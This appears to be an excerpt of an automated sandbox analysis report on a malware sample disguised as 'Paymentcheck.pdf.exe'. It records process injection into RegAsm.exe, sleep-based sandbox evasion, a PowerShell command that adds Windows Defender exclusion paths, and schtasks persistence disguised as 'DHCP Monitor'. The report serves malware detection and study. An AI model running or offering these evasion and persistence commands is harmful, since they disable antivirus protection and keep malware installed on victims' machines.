Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3Show sources
Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6860, type: MEMORYSTR
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeThread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeWindow / User API: threadDelayed 2164
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeWindow / User API: threadDelayed 3128
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeWindow / User API: threadDelayed 6418
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 440
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe TID: 6080Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe TID: 5548Thread sleep time: -18446744073709540s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6276Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe TID: 5536Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 5612Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 7144Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeThread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information queried: ProcessInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeMemory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

barindex
Injects a PE file into a foreign processesShow sources
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000 value starts with: 4D5A
Writes to foreign memory regionsShow sources
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 402000
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 420000
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 422000
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 652008
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs'
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe'
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp715E.tmp'
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp7DD3.tmp'
Source: RegAsm.exe, 0000000D.00000002.933131448.0000000002BB5000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.930540540.0000000003280000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: RegAsm.exe, 0000000D.00000002.930299942.00000000010F0000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.930540540.0000000003280000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 0000000D.00000002.930299942.00000000010F0000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.930540540.0000000003280000.00000002.00000001.sdmpBinary or memory string: Progman
Source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmpBinary or memory string: Program ManagerD$Rk
Source: RegAsm.exe, 0000000D.00000002.932300920.00000000029DB000.00000004.00000001.sdmpBinary or memory string: Program Managerx
Source: RegAsm.exe, 0000000D.00000002.930299942.00000000010F0000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.930540540.0000000003280000.00000002.00000001.sdmpBinary or memory string: Progmanlock
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Users\user\Desktop\Paymentcheck.pdf.exe VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
